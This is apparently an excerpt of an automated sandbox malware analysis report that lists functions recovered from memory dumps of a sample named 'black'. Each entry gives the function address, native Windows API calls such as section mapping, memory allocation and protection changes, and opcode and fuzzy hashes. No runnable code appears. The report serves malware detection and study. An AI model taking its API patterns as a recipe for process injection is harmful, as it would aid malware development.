                                                  • Opcode ID: 4807aee51dd149a0a370e1b0d2bab340c21051aea76598b8c1d380f266b7eed3
                                                  • Instruction ID: 4d5ca6af92ca114f4313712c7633cdea44a7b0e9a6610ec5a8bcf09b42adecf4
                                                  • Opcode Fuzzy Hash: 4807aee51dd149a0a370e1b0d2bab340c21051aea76598b8c1d380f266b7eed3
                                                  • Instruction Fuzzy Hash: 2A42D674E0022ACFDB54DFA9C8947ADBBB2BF48300F1089AAD51AA7350DB705E85DF51
                                                  Function 00CDD3A8 Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-603837250
                                                  • Opcode ID: 36da1f9c165e3346c44918c04a714bbfaf1450f4867a362e19e6aba69e50ba7d
                                                  • Instruction ID: 41a0a7f9af5f2eabcc14f59f248b61639d29557f348c37fd742ce15407f79c97
                                                  • Opcode Fuzzy Hash: 36da1f9c165e3346c44918c04a714bbfaf1450f4867a362e19e6aba69e50ba7d
                                                  • Instruction Fuzzy Hash: 01529F74E00218DFDB54DFA9D884A9DBBB2BF49300F1081EAD51AA7361DB34AE85CF51
                                                  Function 023AC4C8 Relevance: 1.6, APIs: 1, Instructions: 148nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 023AC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: c35ea1287de08754063e9bf17f41f69f2842f11e1127571af68aa0f5606fc7b1
                                                  • Instruction ID: bae29dbdd71961a22f5cfe94f99525888b588c4212a25d297d569f2c02aff0bf
                                                  • Opcode Fuzzy Hash: c35ea1287de08754063e9bf17f41f69f2842f11e1127571af68aa0f5606fc7b1
                                                  • Instruction Fuzzy Hash: 3C519BB5D042589BCF10DFA9D980ADEFBB1FF4A310F20A52AE804B7214D735A945CF58
                                                  Function 023AC780 Relevance: 1.6, APIs: 1, Instructions: 145filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 023AC86E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: ControlDeviceFile
                                                  • String ID:
                                                  • API String ID: 3512290074-0
                                                  • Opcode ID: ef423614c813ea5b7be292dcedd646c230c6ad9269fe75d40c6e18044eb5b897
                                                  • Instruction ID: dbba701418b70771c5389da4e2d2fb2f96ec165294c4f385a199d38872427cd9
                                                  • Opcode Fuzzy Hash: ef423614c813ea5b7be292dcedd646c230c6ad9269fe75d40c6e18044eb5b897
                                                  • Instruction Fuzzy Hash: 1C419AB9D042589FCF10CFA9D980ADEFBB1FB4A310F10A42AE814BB210D735A955CF58
                                                  Function 023AC4D0 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 023AC5CD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: SectionView
                                                  • String ID:
                                                  • API String ID: 1323581903-0
                                                  • Opcode ID: 397c0d7a3f9f501e5e0671d5dba6e61aa7ceea53196454a2c2ec99b7e67cc83d
                                                  • Instruction ID: ceed4985c6df925bbfac8467b44e926b995d427c2fb886aaf2f58830772da70a
                                                  • Opcode Fuzzy Hash: 397c0d7a3f9f501e5e0671d5dba6e61aa7ceea53196454a2c2ec99b7e67cc83d
                                                  • Instruction Fuzzy Hash: BF517AB9D042589BCF10DFA9D9809DEFBB1FF49314F20A52AE808B7210D735A945CF58
                                                  Function 023AC788 Relevance: 1.6, APIs: 1, Instructions: 138filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtDeviceIoControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 023AC86E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: ControlDeviceFile
                                                  • String ID:
                                                  • API String ID: 3512290074-0
                                                  • Opcode ID: 8a219aa444143c7daefb4d4d3f77880897b81de35d6996fd24b5e0e72101a382
                                                  • Instruction ID: f49d36bcee48f660a1378dd2a33c65c54194c934f42b4c4fa92893b9b7e4dbd7
                                                  • Opcode Fuzzy Hash: 8a219aa444143c7daefb4d4d3f77880897b81de35d6996fd24b5e0e72101a382
                                                  • Instruction Fuzzy Hash: 594188B9D042589FCF10CFA9D980ADEFBB5FB0A310F10A42AE814B7210D735A955CF58
                                                  Function 023AC268 Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 023AC33B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: ce0bd56d11f744e6455e4cddcddb8c5a64c847b4da5a02aeeccb77cdf1f6c22e
                                                  • Instruction ID: 9a918530b2950a688c5b81cc62d78b447317534020f1a1f8aeb5e67a219257e4
                                                  • Opcode Fuzzy Hash: ce0bd56d11f744e6455e4cddcddb8c5a64c847b4da5a02aeeccb77cdf1f6c22e
                                                  • Instruction Fuzzy Hash: D2418AB9D012589FCF10CFA9D580ADEFBB1FB49310F24A42AE815B7210D735A946CF98
                                                  Function 023AC270 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 023AC33B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: ca6a943b1b430c214bc006716d82dce634f5197838ed8147718886883eb26be7
                                                  • Instruction ID: b3b4de9fe44c0fea5ffff857bcad3b27d1f3e14271fd04df2a0bd3f1808825ff
                                                  • Opcode Fuzzy Hash: ca6a943b1b430c214bc006716d82dce634f5197838ed8147718886883eb26be7
                                                  • Instruction Fuzzy Hash: 754169B9D052589FCF10CFA9D580ADEFBB1FB49310F24A42AE819B7210D735A945CF98
                                                  Function 023AC130 Relevance: 1.6, APIs: 1, Instructions: 116filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 023AC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  • Opcode ID: 8c88be4cafefd75ba8ad488731071c8a94faa3cd6c9bbb5292e260a9b825cb49
                                                  • Instruction ID: a12b4ec02a57b293db95afa50f65ca079aa5d5097f7541daa2f1a6388c67fc0b
                                                  • Opcode Fuzzy Hash: 8c88be4cafefd75ba8ad488731071c8a94faa3cd6c9bbb5292e260a9b825cb49
                                                  • Instruction Fuzzy Hash: 504189B9D042589FCF10CFA9D980ADEFBB1FB59310F10A02AE815B7210D735A942CF98
                                                  Function 023AC138 Relevance: 1.6, APIs: 1, Instructions: 112filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 023AC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  • Opcode ID: ba702065a8e28c9c93fba8b89c6d582e24c8443b6e986fb140087341353ea472
                                                  • Instruction ID: 8265507191c0a5cf600da2b67fdb016d8478d2f4e1a908df6795835fd414b7ff
                                                  • Opcode Fuzzy Hash: ba702065a8e28c9c93fba8b89c6d582e24c8443b6e986fb140087341353ea472
                                                  • Instruction Fuzzy Hash: 604178B9D002589FCF00CFA9D980ADEFBB1FB59310F10A42AE819B7210D735A945CF98
                                                  Function 023ABC79 Relevance: 1.6, APIs: 1, Instructions: 111memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 023ABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: be4721f7d9d1c44039808a4fe9a9256b6a0e8a9b285acbc0ddd35e7da61a1b01
                                                  • Instruction ID: e27f7e1ae2ba9bb25d4c4a2b5c7e9e842fb948703819c2e05d2d0a90cd4be774
                                                  • Opcode Fuzzy Hash: be4721f7d9d1c44039808a4fe9a9256b6a0e8a9b285acbc0ddd35e7da61a1b01
                                                  • Instruction Fuzzy Hash: CA4168B9D012589FCF00CFA9D984A9EFBB1FF59310F10942AE814BB214D735A945CF64
                                                  Function 023ABC80 Relevance: 1.6, APIs: 1, Instructions: 111memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 023ABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: c42cee4c0db39dc4573f0bbe6abf6f88260ab1f6fe05e46170a7ed4af32a9ff7
                                                  • Instruction ID: 6f30afec8df4efbd9e8f7f889b789553f78077be16ff7189d50a6d0fc36ef3bc
                                                  • Opcode Fuzzy Hash: c42cee4c0db39dc4573f0bbe6abf6f88260ab1f6fe05e46170a7ed4af32a9ff7
                                                  • Instruction Fuzzy Hash: AF4188B9D002589FCF10DFA9D980ADEFBB1FB59310F10942AE818B7210D735A945CFA8
                                                  Function 023AB418 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 023AB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  • Opcode ID: b60bb03a54552db0072347b239679846a69677faee6586b9809abd88bdb3c6b4
                                                  • Instruction ID: f2b5228a8c4ab3889adddedc3ed9f8792a1287cbfe33eeec30550ee875e02172
                                                  • Opcode Fuzzy Hash: b60bb03a54552db0072347b239679846a69677faee6586b9809abd88bdb3c6b4
                                                  • Instruction Fuzzy Hash: 4741A9B4D002589FCF10DFA9D984ADEFBB1FB59320F10902AE819BB210D735A945CF65
                                                  Function 023AB750 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 023AB805
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: d3d5b9c29a1d4f3476be7b27b9fc553cd6bc90dd2fc4cfd605776ce5030aa315
                                                  • Instruction ID: 1994ffa474a5701a15c1ab96ff2c7b50448bab175dc6b3680c68c51e074321c7
                                                  • Opcode Fuzzy Hash: d3d5b9c29a1d4f3476be7b27b9fc553cd6bc90dd2fc4cfd605776ce5030aa315
                                                  • Instruction Fuzzy Hash: A24166B9D002589FCF10CFAAD980ADEFBB5FB59314F10942AE819B7210D735A945CF68
                                                  Function 023AB74A Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 023AB805
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: 814638273c4f289ac45373728c00b40abda3e8297e1ccdb71c3126962126487c
                                                  • Instruction ID: 639f39822cbc8ddbad4a9581810ad1edcc46232c4e2772fa8c12ca2990b5692e
                                                  • Opcode Fuzzy Hash: 814638273c4f289ac45373728c00b40abda3e8297e1ccdb71c3126962126487c
                                                  • Instruction Fuzzy Hash: 214175B8D002589FCF10CFA9D981ADEFBB5BB49314F10942AE818B7210D735A945CF68
                                                  Function 023AC659 Relevance: 1.6, APIs: 1, Instructions: 104filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 023AC70F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileInformationQueryVolume
                                                  • String ID:
                                                  • API String ID: 634242254-0
                                                  • Opcode ID: 4ab638eddede555e117c0eb557cc500cc7fb04662d68c34cc7662f314a6a4f56
                                                  • Instruction ID: 7e1f0f61da7f1e874cd7a3d1e4a53c4893f47ac08403e2f68e8c54bd636f1119
                                                  • Opcode Fuzzy Hash: 4ab638eddede555e117c0eb557cc500cc7fb04662d68c34cc7662f314a6a4f56
                                                  • Instruction Fuzzy Hash: 254178B9D002589FCF10CFA9D980ADEFBB1FB59310F10A42AE815B7210D735A946CF54
                                                  Function 023AC660 Relevance: 1.6, APIs: 1, Instructions: 103filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 023AC70F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileInformationQueryVolume
                                                  • String ID:
                                                  • API String ID: 634242254-0
                                                  • Opcode ID: b1c461af05adde6d29a99e652fd20f15231e3055820afb17eb8803faa0f621f8
                                                  • Instruction ID: 76768de541545c4ede25248f23ad47ef7ab0ee6b9f2ee4c2628d3e7d552b3529
                                                  • Opcode Fuzzy Hash: b1c461af05adde6d29a99e652fd20f15231e3055820afb17eb8803faa0f621f8
                                                  • Instruction Fuzzy Hash: 593176B9D002589FCF10CFAAD980ADEFBB5FB49310F10A42AE819B7210D775A945CF58
                                                  Function 023AB420 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 023AB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  • Opcode ID: 0b716b9a0d87f4b3a38a6c0434f0dd0b10f399780fefce4dad7c5397e5f804da
                                                  • Instruction ID: 16ef91397aa40d3b1859b9df08bfde15a56e8d52739bbdb529f9b1613b3e45cf
                                                  • Opcode Fuzzy Hash: 0b716b9a0d87f4b3a38a6c0434f0dd0b10f399780fefce4dad7c5397e5f804da
                                                  • Instruction Fuzzy Hash: 4C3176B9D002589FCF10DFAAD980ADEFBB5FB59320F10942AE815B7210D735A945CF68
                                                  Function 023D7309 Relevance: 1.6, APIs: 1, Instructions: 97nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationProcess.NTDLL(?,?,?,?), ref: 023D73B6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcess
                                                  • String ID:
                                                  • API String ID: 1801817001-0
                                                  • Opcode ID: d1cf21078a637bbe89131002195b9312b7476fb6572bed0704135e421f63c769
                                                  • Instruction ID: 7ea1e04d179f4aaae8ad34d8f75cf4f63911749fc01f7f9b6350ab0b61d8d12a
                                                  • Opcode Fuzzy Hash: d1cf21078a637bbe89131002195b9312b7476fb6572bed0704135e421f63c769
                                                  • Instruction Fuzzy Hash: 473166B9D012589FCB10CFA9D984ADEFBB0FB49310F20902AE818B7310D375A945CFA5
                                                  Function 023AC3B0 Relevance: 1.6, APIs: 1, Instructions: 97nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 023AC45C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: dab9fbcd99ac2fad8790dbb214826ab6a1a19c2bef628c2f0956a6a8fc74a179
                                                  • Instruction ID: a1250859889091b922939b3a9a3e29a993785e58db09356d79e8305921e9aab8
                                                  • Opcode Fuzzy Hash: dab9fbcd99ac2fad8790dbb214826ab6a1a19c2bef628c2f0956a6a8fc74a179
                                                  • Instruction Fuzzy Hash: 0431AAB5D002589FCF10CFA9D584AEEFBB1FB49310F24942AE818B7210D735A945CF58
                                                  Function 023AC3B8 Relevance: 1.6, APIs: 1, Instructions: 96nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 023AC45C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: ec5d28cc980b0b8bb0751da77694a023926276b922a0b61a107626c1ada7e763
                                                  • Instruction ID: 66d5dce31dd705f2748f48a31e10021eb8a9269083b4f857855e69fd562975cb
                                                  • Opcode Fuzzy Hash: ec5d28cc980b0b8bb0751da77694a023926276b922a0b61a107626c1ada7e763
                                                  • Instruction Fuzzy Hash: 213199B4D012589FCF10CFA9D984AEEFBB5FB49310F10942AE815B7214D735A945CF98
                                                  Function 023AB548 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 023AB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 5fca882ee576b07d1d00f045821291d1ecdf871756e88dd67e5d48f4b0db4884
                                                  • Instruction ID: 3050efc3a11ebd610d49a2b4c766f932fbc4a1af15ae65ab5231e2c426960047
                                                  • Opcode Fuzzy Hash: 5fca882ee576b07d1d00f045821291d1ecdf871756e88dd67e5d48f4b0db4884
                                                  • Instruction Fuzzy Hash: B93198B8D00258DFCF10CFA9D984ADEFBB1EB49314F20942AE815B7210D735A945CF98
                                                  Function 023AB546 Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 023AB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 8ef52204866a5216a4bc259c9d6e9fe3d340272a61b409e8ac22d88ec572ab38
                                                  • Instruction ID: e0fff0236b4fe0ca0c43b96900c0aee8858cd95fae24874a11e162ba6a611150
                                                  • Opcode Fuzzy Hash: 8ef52204866a5216a4bc259c9d6e9fe3d340272a61b409e8ac22d88ec572ab38
                                                  • Instruction Fuzzy Hash: 033197B8D00258DFCF10CFA9D984A9EFBB1EB49314F20942AE815BB210D735A945CF58
                                                  Function 023AB658 Relevance: 1.6, APIs: 1, Instructions: 74nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 431d1a8a31e1ec8b189fdee3255c25c78d9b858662243ab97626e53818379a90
                                                  • Instruction ID: 3a74fd2976d800bc2cad9ec13bf3ed7f4cde3b73d6c7b194c8b46358b572751e
                                                  • Opcode Fuzzy Hash: 431d1a8a31e1ec8b189fdee3255c25c78d9b858662243ab97626e53818379a90
                                                  • Instruction Fuzzy Hash: B331B8B8D002189FCB14CFA9D585AEEFBB5EF49314F20942AE819B7210C735A941CF98
                                                  Function 023AB660 Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 26a4382a971d206229f8aab58c6af53deec94fafd6b3a19ad1f66e6b5510db38
                                                  • Instruction ID: 6fd0073e4f1de5a6a07f09faa594043b6500cd4bf516a538d831438a474346e4
                                                  • Opcode Fuzzy Hash: 26a4382a971d206229f8aab58c6af53deec94fafd6b3a19ad1f66e6b5510db38
                                                  • Instruction Fuzzy Hash: 2931AAB4D012189FCB14CFAAD985AEEFBB5EF49324F10942AE815B7310C775A941CF98
                                                  Function 00CDBD00 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: I,yq
                                                  • API String ID: 0-804320314
                                                  • Opcode ID: c158f2eef0d5d0eb3985bba00d87656a4ad73986247cbab1e1c9b78c1e3a23d0
                                                  • Instruction ID: 2482d8da996dea8f942c342d185e237efc72765181af2e191801a5ae89739841
                                                  • Opcode Fuzzy Hash: c158f2eef0d5d0eb3985bba00d87656a4ad73986247cbab1e1c9b78c1e3a23d0
                                                  • Instruction Fuzzy Hash: 75D1C475E0022ACFCB58CFA9C8815AEBBB2FF49300F10892AD525EB354D7749A41CF50
                                                  Function 00CDE618 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3p3
                                                  • API String ID: 0-1548978683
                                                  • Opcode ID: 8912a132e352885d422bf4a987241fba4b037c8bf1aefb5ca602c5593c291e0c
                                                  • Instruction ID: f4505dec809564f57f89e6f2785eda977b96c7f636a885f522fa02b80dc860ba
                                                  • Opcode Fuzzy Hash: 8912a132e352885d422bf4a987241fba4b037c8bf1aefb5ca602c5593c291e0c
                                                  • Instruction Fuzzy Hash: 99A1C2B4E01219CFCB48DFA8D8849EEBBF2BF88310F14856AE425AB350D7759A45CF50
                                                  Function 00CDE628 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3p3
                                                  • API String ID: 0-1548978683
                                                  • Opcode ID: 46eb85d89edbac9864714f63d99b66a07bc400d4cebeaa01ffc06eed53c0654b
                                                  • Instruction ID: ba88631f39f59cf447d2a5f740d6739a4d76d4d9e263c6c5c4523fd2e5d2b4b9
                                                  • Opcode Fuzzy Hash: 46eb85d89edbac9864714f63d99b66a07bc400d4cebeaa01ffc06eed53c0654b
                                                  • Instruction Fuzzy Hash: 48A192B4E00219CFDB48DFA9D8849EEBBF2BF88311F14852AE425AB350D7759A45CF50
                                                  Function 00CDA188 Relevance: .3, Instructions: 327COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b878763c0a2c0b363527e6db31446c2fce843c16a4bd716f5f2fca680784d32
                                                  • Instruction ID: 6bf2b8333d02f1a8c4b27c5ee386bb11a2b2b26e76e5095d93eaf3096ada5d9c
